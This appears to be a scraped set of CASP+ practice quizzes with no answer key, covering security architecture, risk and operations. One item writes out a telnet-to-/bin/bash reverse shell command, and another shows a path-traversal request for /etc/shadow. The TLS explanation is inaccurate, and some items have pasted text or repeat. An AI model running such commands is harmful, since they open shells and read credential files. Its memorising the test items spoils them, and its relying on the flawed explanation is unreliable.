CASP no answers.pdf

Full Transcript

Points: 0/1
1. A security analyst has been tasked with assessing a new API. The analyst needs to be able to test for a variety of
different inputs, both malicious and benign, in order to close any vulnerabilities. Which of the following should the
analyst use to achieve this goal?
A. Fuzz testing
B. Static analysis
C. Input validation
D. Post-exploitation

Points: 0/1
2. In order to authenticate employees who call in remotely, a company’s help desk staff must be able to view partial
information about employees because the full information may be considered sensitive. Which of the following
solutions should be implemented to authenticate employees?
A. Metadata
B. Encryption in transit
C. Data scrubbing
D. Field masking

Points: 0/1
3. The IT team suggests that the company would save money by using self-signed certificates, but the security team
indicates the company must use digitally signed 3rd party certificates. Which of the following is a valid reason to
pursue the security team's recommendation?
A. There is minimal benefit using a CRL
B. There is more control is using a local certificate over a 3rd party certificate
C. PKCS#10 is still preferred over PKCS#12
D. Private-key CSR signage prevents on-path interception
Points: 0/1
4. A SaaS startup is maturing its DevSecOps program and needs to identify weaknesses earlier in the development
process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated
with the remediation. The startup began its early testing efforts with DAST to cover public facing application
components and recently implemented a bug bounty program. Which of the following will best accomplish the
company's objectives?
A. CMS
B. WAF
C. SAST
D. RASP
https://www.synopsys.com/blogs/software-security/sast-iast-dast-rasp-differences.html

Points: 0/1
5. Company A acquired Company B. During an initial assessment, the companies discover they are using the same
SSO system. To help users with the transition, Company A is requiring the following:
Before the merger is complete, users from both companies should be using a single set of usernames and
passwords
Users in the same departments should have the same set of rights and permissions, but they should have different
sets of rights and permissions if they have different IPs
Users from Company B should be able to access Company A’s available resources
Which of the following are the best solutions? (Select TWO)
A. Updating login scripts
B. Implementing attribute-based access control
C. Installing COmpany As Kerberos systems in Company Bs network
D. Enabling MFA
E. Establishing one-way trust from Company B to Company A
F. Installing new GPO policies
Points: 0/1
6. A security architect is tasked with securing a new cloud videoconferencing and collab platform to support a new
distributed workforce. The security architects key objectives are:
Maintain customer trust
Ensure non-repudiation
Minimize data leakage
Of the following, which would be the best set of recommendations from the security architect?
A. Enable watermarking, enable user auth requirement, disable video recording
B. Enable end to end encryption, disable video recording, disable file exchange
C. Enable the user auth requirement, enable end to end encryption, enable waiting rooms
D. Disable file exchange, enable watermarking, enable user auth requirement
Points: 0/1
7. A security admin needs to implement a security solution that will:
Improve performance with less congestion on network traffic
Limit attack surface in case of an incident
Improve access control for external and internal network security
Which of the following should the security admin do?
A. Integrate threat feeds into the FIM
B. Configure the SIEM dashboards to provide alerts and visualization
C. Deploy DLP rules based on updated PII formatting
D. Update FW rules to match any new IP addresses in use

Points: 0/1
8. A security team created tickets to track the progress of remediations. Which of the following will specify the due
dates for high- and critical-priority findings?
A. MOU
B. MSA
C. SLA
D. ISA
Points: 0/1
9. An organization's existing infrastructure includes site to site VPNs between data centers. Over the past year, a
sophisticated attacker exploited a zero day on the VPN concentrator. In response, the CISO is making infrastructure
changes to mitigate the risk of service loss should another zero day exploit be used against the VPN solution. Which
of the following designs would be best for the CISO to use?
A. Using Base64 encoding within the existing site to site VPN connections
B. Implementing IDS services with each VPN concentrator
C. Transitioning to a container-based architecture for site based services
D. Adding a 2nd redundant layer of alternate vendor VPN concentrators
E. Distributing security resources across VPN sites
Points: 0/1
10. When implementing serverless computing, an organization must still account for:
A. the underlying computing network infrastructure
B. hardware compatibility
C. the security of its data
D. patching the service
Points: 0/1
11. The CEO of an online retailer notices a sudden drop in their sales. A security analyst at the retailer detects a
redirection of unsecure web traffic to a competitor’s site. Which of the following would best prevent this type of
attack?
A. Configuring certificate pinning
B. Enforcing DNSSEC
C. Deploying certificate stapling
D. Enabling HSTS
Points: 0/1
12. Which of the following will provide the best solution for organizations that want to securely back up the MFA
seeds for its employees in a central, offline location with minimal management overhead?
A. HSM
B. Encrypted database
C. Key escrow service
D. Secrets management
Points: 0/1
13. A security engineer is accessing a legacy server and needs to determine if the FTP is running and on which
port. The service can not be turned off, as it would impact critical applications' ability to function. Which command
will provide the info necessary to create a FW rule to prevent that service from being exploited?
A. netstat -tulpn
B. service ftpd status
C. service --status-all | grep ftpd
D. chkconfig --list
E. systemctl list-unit-file --type service ftpd

-t : Display TCP connections. -
u : Display UDP connections.
-l : Display listening socket (services).
-p : Display the process associated with the service.
-n : Display numerical addresses instead of resolving hostnames.

Points: 0/1
14. A SOC analyst gets an alert about a potential compromise and reviews the following SIEM logs:
1:15:02PM JMyers successful login on laptop 318
1:15:45PM JMyers launched outlook.exe on laptop318
1:17:03PM Process outlook.exe launch cmd.exe on laptop318
1:17:04PM Process cmd.exe launched rdp.exe on laptop318
1:17:04PM Process cmd.exe launched rdp.exe on laptop318
1:17:05PM JMyers successful login on server112
1:17:05PM JMyers successful login on server113
1:17:07PM JMyers launched cmd.exe on server112
1:17:07PM JMyers launched cmd.exe on server113
Which of the following is the most appropriate action for the analyst to recommend?
A. Alerting JMyers about the potential account compromise
B. Isolating laptop318 from the network
C. Creating NIPS and HIPS rules to prevent logins
D. Disabling account JMyers to prevent further lateral movement
 Points: 0/1
15. What is record level encryption commonly used to do?
A. Encrypt individual packets
B. Protect individual files
C. Encrypt the master boot record
D. Protect database fields
Points: 0/1
16. A security architect for a large, multinational manufacturer needs to design and implement a security solution to
monitor traffic. When designing the solution, which of the following threats should the security architect focus on
to prevent attacks against the OT network?

A. Multiple solicited responses over time
B. The application of an unsupported encryption algorithm
C. Packets that are the wrong size or length
D. The use of any non-DNP3 communication on a DNP3 port
Points: 0/1
17. A security engineer is creating a single CSR for the following web hostnames:
www.int.internal
www.company.com
home.internal
www.internal
Which would meet the requirement?
A. CN
B. CA
C. Issuer
D. SAN
E. CRL
Points: 0/1
18. The principal security analyst for a global manufacturer is investigating a security incident related to abnormal
behavior in the UCS network. A controller was restarted as part of the troubleshooting process, and the following
issues were identified when the controller was restarted:
SECURE BOOT FAILED:
FIRMWARE MISMATCH EXPECTED 0xFDC479 ACTUAL 0x79F31B
During the investigation, this modified firmware version was identified on several other controllers at the site. The
official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK
framework for ICS includes this technique?
A. Persistence
B. Evasion
C. Lateral movement
D. Collection

Points: 0/1
19. Which of the following is a risk associated with SDN?
A. Expanded attack surface
B. Increased hardware management costs
C. Reduced visibility of scaling capabilities
D. New firmware vulnerabilities
Points: 0/1
20. A forensics investigator is analyzing an executable file extracted from storage media that was submitted for
evidence. The investigator must use a tool that can identify whether the executable has indicators, which may point
to the creator of the file. Which of the following should the investigator use while preserving evidence integrity?
A. ldd
B. bcrypt
C. ssdeep
D. dcfldd
E. SHA-3
Points: 0/1
21. A security architect is implementing a SOAR solution in an organization’s cloud production environment to
support detection capabilities. Which of the following will be the most likely benefit?
A. Increased risk availability
B. Optimized cloud resource utilization
C. Improved security operations center performance
D. Automated FW log collection tasks
Points: 0/1
22. A systems engineer needs to develop a solution that uses digital certificates to allow authentication to laptops.
Which of the following authenticator types would be most appropriate for the engineer to include in the design?
A. TOTP token
B. Device certificate
C. Biometric
D. Smart card
Points: 0/1
23. An organization’s board of directors has asked the CISO to build a 3rd party management program. Which of the
following best explains a reason for this request?
A. Risk management
B. Risk transference
C. Supply chain visibility
D. Support availability
Points: 0/1
24. An organization has an operational management with a specific equipment vendor. The organization is located
in the US, but the vendor is located in another region. Which of the following risks would be most concerning to the
organization in the event of equipment failure?
A. Support may not be available during all business hours
B. Each region has different regulatory frameworks to follow
C. The organization requires authorized vendor specialists
D. Shipping delays could cost the organization money
Points: 0/1
25. The general counsel at an organization has received written notice of upcoming litigation. The general counsel
has issued a legal record hold. Which of the following actions should the organization take to comply with the
request?
A. Request that all users do not delete any files
B. Require employees to be trained on legal record holds
C. Block communication with the customer while litigation is ongoing
D. Preserve all communications matching the requested search terms
Close
Retake Quiz
Points: 0/1
1. A security engineer is concerned about the threat of side-channel attacks. The company experienced a past
attack that degraded parts of a SCADA system, causing a fluctuation to 20,000 rpms from its normal operating
range. This caused the part to deteriorate more quickly than the mean time to failure. A further investigation
revealed the attacker was able to determine the acceptable rpm range, and the malware would then fluctuate the
rpm until the part failed. Which of the following solutions would be best to prevent a side-channel attack in the
future?
A. Implementing a HIDS
b. Installing online hardware sensors
c. Air gapping important ICS and machines
d. Installing a SIEM agent on the endpoint

Points: 0/1
2. Which of the following is the most important cloud specific risk from the CSPs viewpoint?
A. CI/CD deployment failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion

Points: 0/1
3. A mobile admin is reviewing the following mobile device DHCP logs to ensure the proper mobile settings are
applied to managed devices:
10, 10/18/2021, 17:01:05, Assign, 192.168.1.10, UserA-MobileDevice, 0236FB12CA0B
23, 10/19/2021, 07:11:19, Assign, 192.168.1.23, UserA-MobileDevice, 068ADIFAB109
10, 10/20/2021, 19:22:56, Assign, 192.168.1.96, UserA-MobileDevice, 0ABC65E81AB0
10, 10/21/2021, 22:34:15, Assign, 192.168.1.33, UserA-MobileDevice, BAC034EF9451
10, 10/22/2021, 11:55:41, Assign, 192.168.1.12, UserA-MobileDevice, 0E938663221B
Which of the following mobile configuration settings is the mobile admin verifying?
A. Wireless network auto joining
B. 802.1X with mutual authentication
C. Service set identifier authentication
D. Association MAC address randomization

Points: 0/1
4. Which of the following technologies would benefit the most from the use of biometric readers, proximity badge
entry systems, and the use of hardware security tokens to access various environments and data entry systems?
A. Machine learning
B. Deep learning
C. Nanotechnology
D. Biometric impersonation
E. Passwordless authentication

Points: 0/1
5. A security manager has written an incident response playbook for insider attacks and is ready to begin testing it.
Which of the following should the manager conduct to test the playbook?
A. Centralized logging, data analytics, and visualization
B. Threat emulation
C. Threat hunting
D. Automated vulnerability scanning

Points: 0/1
6. A security admin wants to detect a potential forged sender claim in the envelope of an email. Which of the
following should the security admin implement? (select TWO)
A. TLS
B. SPF
C. DMARC
D. MX record
E. S/MIME
F. DNSSEC

Points: 0/1
7. A pentester inputs the following command:
telnet 192.168.99.254 343 \ /bin/bash \ telnet 192.168.99.254 344
This command will allow the pentester to establish a:
A. network pivot
B. proxy chain
C. reverse shell
D. port mirror

Points: 0/1
8. A government agency's cyber analyst is concerned about how PII is protected. A supervisor indicates that Privacy
Impact Assessment must be done. Which of the following describes a function of a Privacy Impact Assessment?
A. To document residual risks
B. To identify the network ports
C. To evaluate threat acceptance
D. To validate the project participants

Points: 0/1
9. An IoT device implements an encryption module within its SoC, where the asymmetric private key has been
defined in a write-once read-many portion of the SoC hardware. Which of the following should the IoT manufacturer
do if the private key is compromised?
A. Replace the public portion of the IoT key on its servers
B. Release a patch for the SoC software
C. Manufacture a new IoT device with a redesigned SoC
D. Use over the air updates to replace the private key

Points: 0/1
10. A small bank is evaluating different methods to address and resolve the following requirements:
Must maintain confidentiality if one piece of the layer is compromised
Must be able to store credit card data using the smallest amount of data possible
Must be compliant with PCI-DSS
Which of the following is the best solution for the bank?
A. Masking
B. Scrubbing
C. Tokenization
D. Homomorphic encryption

Points: 0/1
11. A network admin managing a Linux web server notices the following traffic:
http://comptia.org/../../../../etc/shadow
Which of the following is the best action for the network admin to take to defend against his type of attack?
A. Validate that MFA is enabled on the server for all user accounts
B. Validate that the server is not deployed with default account credentials
C. Validate the server certificate and trust chain
D. Validate the server input and append the input to the base directory path

Points: 0/1
12. A security engineer needs to select the architecture for a cloud database that will protect an organization’s
sensitive data. The engineer has a choice between a single tenant or a multitenant database architecture offered by
a cloud vendor. Which of the following best describes the security benefit org the single-tenant option? (Select
TWO)
A. Increased geographic diversity
B. Full control and ability to customize
C. High degree of privacy
D. Most cost-effective
E. Low resilience to side-channel attacks
F. Ease of backup and restoration

Points: 0/1
13. An employee’s device was missing for 96 hours before being reported. The employee called the help desk for
another device. Which of the following phases of the incident response cycle needs improvement?
A. Resolution
B. Investigation
C. Containment
D. Preparation

Points: 0/1
14. An internal security audit determines that Telnet is currently being used within the environment to manage
network switches. Which of the following tools should be utilized to identify credentials in plaintext that are used to
log in to these devices?
A. Fuzzer
B. HTTP interceptor
C. Port scanner
D. Password cracker
E. Network traffic analyzer

Points: 0/1
15. A company is acquiring a competitor, and the board has asked the CIO to perform due diligence activities on the
competitor prior to acquisition. A recent compliance audit of the competitor environment shows no critical findings
and exemplary policy and processes. Since the competitor has an audited environment, the CIOs recommendation
to the board is to move forward with existing security capabilities and write additional security controls to manage
the additional risks. Which of the following risk management strategies is the CIO recommending?
A. Mitigate and accept
B. Reduce and mitigate
C. Transfer and accept
D. Mitigate and transfer
Points: 0/1
16. After connecting to a company’s newly built production website (https://www.company.com) using a browser, a
systems admin reviewed the following output:
/var/www/html/index.html
/var/www/html/image01.png
/var/www/html/server.crt
/var/www/html/server.gif
/var/www/html/server.key
/var/www/html/test.cgi
/var/www/html/test-form.php
/var/www/html/user-db-connect.php
/var/www/html/user-auth.php
Which of the following should the admin do next? (Select TWO)
A. Implement a WAF in front of the web server
B. Disable the directory listing
C. Configure the server to load index.html by default
D. Scan PHP and CGI files for secure coding
E. Update user-db-connect.php with the appropriate credentials
F. Request an update to the CRL

Points: 0/1
17. An organization needs to classify its systems and data in accordance with external requirements. Which of the
following roles is best qualified to perform this task?
A. Data owner
B. Data processor
C. Data custodian
D. Systems admin
E. Data steward

Points: 0/1
18. In a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the
following is the most cost-effective risk response?
A. Risk transfer
B. Risk mitigation
C. Risk acceptance
D. Risk avoidance

Points: 0/1
19. After the latest risk assessment, the CISO decides to meet with the development and security teams to find a
way to reduce the security task workload. The CISO would like to:
Have a solution that uses API to communicate with other security tools
Use the latest technology possible
Have the highest controls possible on the solution
Which of the following is the best option to meet these requirements?
A. CSP
B. CASB
C. SOAR
D. EDR

Points: 0/1
20. An organization is in frequent litigation and has a large number of legal holds. Which of the following types of
functionality should the organization’s new email system provide?
A. DLP
B. Encryption
C. E-discovery
D. Privacy-level agreements

Points: 0/1
21. An organization recently completed a security controls assessment. The results highlighted the following
vulnerabilities:
Out of date definitions
Misconfigured operating systems
An inability to detect active attacks
Unimpeded access to critical servers USB ports
Which of the following will most likely reduce the risks that were identified by the assessment team?
A. Implemented a vulnerability management program and a SIEM tool with alerting, install a badge system with
zones, restrict privileged access
B. Install EDR on endpoints, configure group policy, lock server room doors, install a camera system with
guards watching 24/7
C. Create an information security program that addresses user training, perform weekly audits of user
workstations, utilize a centralized configuration management program
D. Update antivirus definitions, install NGFW with logging enabled, use USB port lockers, run SCAP scans
weekly

Points: 0/1
22. A company has retained the services of a consultant to perform a security assessment. As part of the
assessment, the consultant recommends engaging with others in the industry to collaborate in regards to emerging
attacks. Which of the following would best enable this activity?
A. ISAC
B. OSINT
C. CVSS
D. Threat modeling

Points: 0/1
23. The CISO asked a security manager to set up a system that sends an alert whenever a mobile device enters a
sensitive area of the company’s data center. The CISO would also like to be able to alert the individual who is
entering the area that the access was logged and monitored. Which of the following would meet these
requirements?
A. Bluetooth
B. Geofencing
C. NFC
D. SMS

Points: 0/1
24. A security officer is requiring all personnel working on a special project to obtain a security clearance requisite
with the level of all information being accessed. Data on this network must be protected at the same level of each
clearance holder. The need to know must be verified by the data owner. Which of the following should the security
officer do to meet these requirements?
A. Create a rule to authorize personnel only from certain IPs to access the files
B. Assign labels to the files and require formal access authorization
C. Assign attributes to each file and allow authorized users to share the files
D. Assign roles to users and authorize access to files based on the roles
Points: 0/1
25. A company recently deployed a SIEM and began importing logs from a fw, file server, domain controller, web
server, and a laptop. A security analyst receives a series of SIEM alerts and prepares to respond. The following is
the alert information:
Severity Source Device Event Info Time (UTC)
Medium abc-usa-fw01 RDP (3389) traffic from 1020:08
abc-admin-lp01 to abc-usa-fs1
Low abc-ger-dc1 Successful logon event for user 1020:34
rsmith on abc-usa-fs1
Medium abc-ger-fw01 RDP (3389) traffic from 1021:02
abc-usa-fs1 to abc-ger-fs1
Low abc-usa-fw01 SMB (445) traffic from 1020:21
abc-usa-fs1 to abc-web01
Low abc-usa-dc1 Successful logon event for user 1024:55
rsmith on abc-ger-fs1
High abc-usa-fw01 FTP (21) traffic from 1025:16
abc-ger-fs01 to abc-web01
High abc-web01 Successful logon event 1126:40
for user Administrator
Which of the following should the security analyst do first?
A. Shutdown abc-usa-fw01; the remote access VPN vulnerability is exploited
B. Disable rsmith account; it is likely compromised
C. Shutdown the abc-usa-fs1 server; a plaintext credential is being used
D. Disable Administrator on abc-usa-fs1; the local account is compromised
Close
Retake Quiz
Points: 0/1
1. To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within its
proprietary software. Which of the following should the company consider to maximize risk reduction from
vulnerabilities introduced by OpenSSL?
A. Compile 3rd party libraries into the main code statically instead of using dynamic loading
B. Include stable, long term releases of 3rd party libraries instead of using newer versions
C. Ensure the 3rd party library implements the TLS and disable weak ciphers
D. Implement an ongoing, 3rd party software and library review and regression testing

Points: 0/1
2. A security team performed an external attack surface analysis and discovered the following issues on a group of
application servers:
The majority of the systems have end of life operating systems
The latest patches that are available are over two years old
The systems are considered mission critical for client support
The proprietary software running on the systems is not compatible with newer versions of the operating system
Server outages would negatively affect quarterly revenue projections
Which of the following would allow the security team to immediately mitigate the risks inherent to this situation?
A. Isolate the servers from the internet and configure an internal ACL, only allowing to authorized employees
B. Document the application servers as being end of life and define a target date for decommission
C. Contact the vendor for the proprietary software and negotiate a new maintenance contract
D. Implement a WAF between the application servers and the external perimeter

Points: 0/1
3. A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what
constitutes a risk to the organization. Which of the following should be the analyst’s first action?
A. Determine which security compliance standards should be followed
B. Perform a full system penetration test to determine the vulnerabilities
C. Ascertain the impact of an attack on the availability of crucial resources
D. Create a full inventory of information and data assets

Points: 0/1
4. Company A acquired Company B. During an audit, a security engineer found Company B's environment was
inadequately patched. In response, Company A placed a fw between the two environments until Company B's
infrastructure could be integrated into Company A's security program. Which of the following risk handling
techniques was used?
A. Avoid
B. Accept
C. Transfer
D. Mitigate

Points: 0/1
5. A company wants to refactor a monolithic application to take advantage of cloud native services and service
microsegmentation to secure sensitive application components. Which of the following should the company
implement to ensure the architecture is portable?
A. Virtualized emulators
B. Orchestration
C. Type2 hypervisor
D. Containerization
Points: 0/1
6. A hospital has fallen behind with patching known vulnerabilities due to concerns that patches may cause
disruptions in the availability of data and impact patient care. The hospital does not have a tracking solution in place
to audit whether systems have been updated or to track the length of time between notification of the weakness and
patch completion. Since tracking is not in place, the hospital lacks accountability with regard to who is responsible
for these activities and the timeline of patching efforts. Which of the following should the hospital do first to mitigate
this risk?
A. Ensure CVEs are current
B. Complete a vulnerability analysis
C. Purchase a ticketing system for auditing efforts
D. Obtain guidance from the health ISAC
E. Train admins on why patching is important
Points: 0/1
7. Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS
1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing traffic
via Wireshark. The security architect finds that the issue is the time required to validate the certificate. Which of the
following solutions should the security architect recommend?
A. Adding more nodes to the web server clusters
B. Changing the cipher algorithm used on the web server
C. Implementing OCSP stapling on the server
D. Upgrading to TLS 1.3

Points: 0/1
8. A CSO is concerned about the number of successful ransomware attacks that have hit the company. The data
indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants
to evaluate whether the training has been successful. Which of the following should the CSO implement?
A. Performing a risk assessment
B. Conducting a sanctioned vishing attack
C. Simulating a spam campaign
D. Executing a pen test

Points: 0/1
9. As part of a policy and procedure review, a data privacy officer is working with system owners to identify
appropriate assignments for personnel to perform access management activities based on the input provided by
system owners. Which of the following describes the personnel who will receive input from system owners?
A. Data subjects
B. Authoritative sources
C. Systems admins
D. Regulators
E. Custodians
Points: 0/1
10. During a network defense engagement, a red team is able to edit the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Which of the following tools is the red team using to perform this action?
A. Fuzzer
B. Network vulnerability scanner
C. SCAP scanner
D. PowerShell
Points: 0/1
11. A DevOps engineer submits a VM for hardening verification as part of a new IaaS deployment. The DevOps
engineer attests that:
The device has all production software installed
All services are running on their default ports
All security policies have been applied through GPOs
All unnecessary software has been removed
The submitting engineer provided the following information:
Server type MS SQL
Management interface RDP
Windows file sharing required Yes
A compliance engineer performs an unauthenticated network vulnerability scan as part of hardening verification. The
vulnerability scanner has fw access to the device, and its source IP has been added to the allow list in the devices
endpoint protection software. No known vulnerabilities have been identified. The scan identified the following ports:
Port Status
445 Open
22 Open
3389 Open
135 Open
139 Open
Company policy states that a system that has no known vulnerabilities and has been confirmed to have all
production software installed will meet hardening requirements and will be approved for production. Which of the
following actions should the compliance engineer take, based on the server configuration and the results of the
vulnerability scan? (Select THREE)
A. Reject the server
B. Have the user verify that MS SQL is installed properly
C. Recommend uninstalling PostgreSQL
D. Recommend closing the service on port 22
E. Approve the server
F. Recommend closing the service on port 3389
G. Recommend removing Flash Player
H. Recommend closing the service on port 445
Points: 0/1
12. A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect
unauthorized code modification. Which of the following would be best for the developer to perform? (Select TWO)
A. Verify MD5 hashes
B. Encrypt with 3DES
C. Utilize code signing by a trusted 3rd party
D. Compress the program with a password
E. Implement certificate based authentication
F. Make the DACL read-only
Points: 0/1
13. A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The
investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which
of the following steps in the process should have occurred first?
A. Clone the disk
B. Collect the most volatile
C. Copy the relevant log files
D. Preserve secure storage
Points: 0/1
14. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The
solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate
traffic. Which of the following would satisfy the requirement?
A. NIDS
B. NIPS
C. WAF
D. Reverse proxy
Points: 0/1
15. A multinational organization was hacked, and the IRTs timely action prevented a major disaster. Following the
event, the team created an after action report. Which of the following is the primary goal of an after action review?
A. To identify ways to improve the response process
B. To create a plan of action and milestones
C. To determine the identity of the attacker
D. To gather evidence for subsequent legal action
Points: 0/1
16. A local university that has a global footprint is undertaking a complete overhaul of its website and associated
systems. Some of the requirements are:
Handle an increase in customer demand of resources
Provide quick and easy access to information
Provide high quality streaming media
Create a user friendly interface
Which of the following actions should be taken first?
A. Deploy high availability web servers
B. Enhance network access controls
C. Implement a content delivery network
D. Migrate to a virtualized environment
Points: 0/1
17. A security architect is analyzing an old application that is not covered for maintenance anymore because the
software compamy is no longer in business. Which of the following techniques should have been implemented to
prevent these types of risks?
A. Source code escrows
B. Software audits
C. Code review
D. Supply chain visibility
Points: 0/1
18. A common industrial protocol has the following characteristics:
Provides for no authentication/security
Is often implemented in a client/server relationship
Is implementing as either RTU or TCP/IP
Which of the following is being described?
A. Profinet
B. Zigbee
C. Modbus
D. Z-wave
Points: 0/1
19. A security consultant has been asked to identify a simple, secure solution for a small business with a single
access point. The solution should have a single SSID and no guest access. The customer facility is located in a
crowded area of town, so there is a high likelihood that several people will come into range every day. The customer
has asked that the solution require low administrative overhead and be resistant to offline password attacks. Which
of the following should the security consultant recommend?
A. WPA2-PSK
B. WPA2-Enterprise
C. WPA3-Personal
D. WPA3-Enterprise
Points: 0/1
20. An organization established an agreement with a partner company for specialized help desk services. A senior
security officer within the organization is tasked with providing documentation required to set up a dedicated VPN
between the two entities. Which of the following should be required?
A. MOU
B. SLA
C. NDA
D. ISA
Close
Retake Quiz
Review Answers
Points: 0/1
1. An organization is in frequent litigation and has a large number of legal holds. Which of the following types of
functionality should the organization's new email system provide?
A. DLP
B. Encryption
C. E-discovery
D. Privacy-level-agreements

Points: 0/1
2. Which of the following should be established when configuring a mobile device to protect user internet privacy, to
ensure the connection is encrypted, and keep user activity hidden? (Select TWO)
A. RDP
B. MDM
C. Tunneling
D. VDI
E. Proxy
F. MAC randomization

Points: 0/1
3. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and
identity information, such as passport numbers. The SaaS CRM system does not meet the organization’s current
security standards. Post remediation work, the assessment recorded the following:
The will be a $20k per day revenue loss for each day the system is delayed going into production
The inherent risk was high
The residual risk is low
The solution rollout to the contact center will be a staged deployment
Which of the following risk handling techniques will best meet the organization’s requirements post remediation?

A. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service
B. Accept the risk, as compensating controls have been implemented to manage the risk
C. Apply for a security excemption, as the risk is too high to accept
D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider

Points: 0/1
4. In a shared responsibility model for PaaS, which of the following is the customer's responsibility?
A. OS security
B. Physical security
C. Host infrastructure
D. Network security

Points: 0/1
5. An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to
be implemented with the least amount of downtime. Which of the following should the analyst perform?
A. Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and
then choose the best solution based on the metrics.
B. Implement all the solutions at once in a virtual lab and the collect the metrics. After collection, run the attack
simulation. Choose the best solution based on the metrics.
C. Implement every solution one at a time in a virtual lab, running metric collection each time. After the
collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best
solution based on the metrics.
D. Implement every solution one at a time in a virtual lab, running an attack simulation each time while
collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on
the metrics.
Points: 0/1
6. A 3rd party organization has implemented a system that allows it to analyze customers' data and deliver analysis
results without being able to see the raw data. Which of the following is the org implementing?
A. Data Lake
B. Machine learning
C. Asynchronous keys
D. Homomorphic encryption

Points: 0/1
7. A security engineer is implementing a server-side TLS configuration that provides forward secrecy and
authenticated encyption with associated data. Which of the following algorithms, when combined into a cipher suite,
will meet the requirements? (Select THREE)
A. RC4
B. ECDSA
C. GCM
D. DH
E. RSA
F. EDE
G. CBC
H. AES
To achieve forward secrecy and authenticated encryption with associated data (AEAD), you should use modern and
secure cipher suites. Here are three algorithms that, when combined into a cipher suite, meet these requirements:
GCM (Galois/Counter Mode): GCM provides both authenticated encryption and the ability to achieve forward
secrecy when used with appropriate key exchange mechanisms like ECDHE or DHE.
AES (Advanced Encryption Standard): AES is a symmetric encryption algorithm commonly used with AEAD cipher
suites.
RSA (Rivest–Shamir–Adleman): While RSA is not typically used for forward secrecy, it can be used for
authentication in conjunction with other algorithms that provide forward secrecy.

Points: 0/1
8. A university issues badges through a homegrown identity management system to all staff and students. Each
week during the summer, temporary summer school students arrive and need to be issued a badge to access
minimal campus resources. The security team received a report from an outside auditor indicating the homegrown
system is not consistent with the best practices in the security field. Which of the following should the security team
recommend first?
A. Working with procurement and creating a requirements document to select a new IAM system/vendor
B. Updating the identity management system to use discretionary access control
C. Investigating a potential threat identified in logs related to the identity management system
D. Beginning research on 2f authentication to later introduce into the identity management system
Points: 0/1
9. Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?
A. Ediscovery
B. Review analytics
C. Chain of custody
D. Information governance
Points: 0/1
10. A security analyst has been tasked with providing key information in the risk register. Which of the following
outputs or reults would be used to best provide the information needed to determine the security posture for a risk
decision? (Select TWO)
A. Network traffic analyzer
B. Password cracker
C. Protocol analyzer
D. Vulnerability scanner
E. SCAP scanner
F. Port scanner
Points: 0/1
11. An organization is looking to establish more robust security measures by implementing PKI. Which of the
following should the security analyst implement when considering mutual authentication?
A. Public keys on both endpoints
B. Shared secret for both endpoints
C. Perfect forward secrecy on both endpoints
D. A common public key on each endpoint
E. A common private key on each endpoint
Points: 0/1
12. A small data center experienced a ransomware attack, and 10TB of data was encrypted. The data is now
unavailable. The attacker was able to convince a guard at the data center entrance that the necessary access card
was previously left inside the building. The guard allowed the individual to enter the building, and the attacker was
abe to leave an infected pen drive. The CISO is now considering controls to prevent such events from reoccurring in
the future. Which of the following describes this phase in the CISO’s response process?
A. Recovery
B. Identification
C. Analysis
D. Detection
Points: 0/1
13. A security architect is analyzing an old application that is not covered for maintenance anymore because the
software company is no longer in business. Which of the following techniques should have been implemented to
prevent these types of risks?
A. Supply chain visibility
B. Source code escrows
C. Software audits
D. Code review

Points: 0/1
14. A company hosts a large amount of data in blob storage for its customers. The company recently had a number
of issues with data being prematurely deleted before the scheduled backup processes could be completed. The
management team has asked the security architect for a recommendation that allows blobs to be deleted
occasionally, but only after a successful backup. Which of the following solutions will best meet this requirement?
A. Enable fast recovery on the storage account
B. Make the blob immutable
C. Implement soft delete for the blobs
D. Mirror the blobs at a local data center
E. Blob soft delete protects an individual blob, snapshot, or version from accidental deletes or overwrites by
maintaining the deleted data in the system for a specified period of time. During the retention period, you
can restore a soft-deleted object to its state at the time it was deleted. After the retention period has expired,
the object is permanently deleted.
https://learn.microsoft.com/en-us/azure/storage/blobs/soft-delete-blob-overview
Points: 0/1
15. A new mandate by the corporate security team requires that all endpoints must meet a security baseline before
accessing the corporate network. All server and desktop computers are scanned by the dedicated internal scanner
appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of
the following is the best option for the security team to ensure worker laptops are scanned before being granted
access to the corporate network?
A. Implement network access control to perform host validation of installed patches
B. Create a vulnerability scanning subnet for remote workers to connect to on the network at HQ
C. Install a vulnerability scanning agent on each remote laptop to submit scan data
D. Create an 802.1X implementation with certificate-based device identification
Points: 0/1
16. When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belong to the
client?
A. Data
B. Physical security
C. Network
D. Storage
Points: 0/1
17. A cloud engineer is tasked with improving the responsiveness and security of a company's cloud-based web
application. The company is concerned that international users will experience increased latency. Which of the
following is the best technoogy to mitigate this concern?
A. Containerization
B. Caching
C. Clustering
D. Content delivery network

Points: 0/1
18. Which of the following is the most important security objective when applying cryptography to control messages
that tell an ICS how much electrical power to output?
A. Assuring the integrity of messages
B. Improving the availability of messages
C. Enforcing protocol conformance for messages
D. Ensuring non-repudiation of messages
Points: 0/1
19. A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect
unauthorized code modification. Which of the following would be best for the developer to perform? (Select TWO)
A. Utilize code signing by a trusted 3rd party
B. Compress the program with a password
C. Encypt with 3DES
D. Verify MD5 hashes
E. Make the DACL read-only
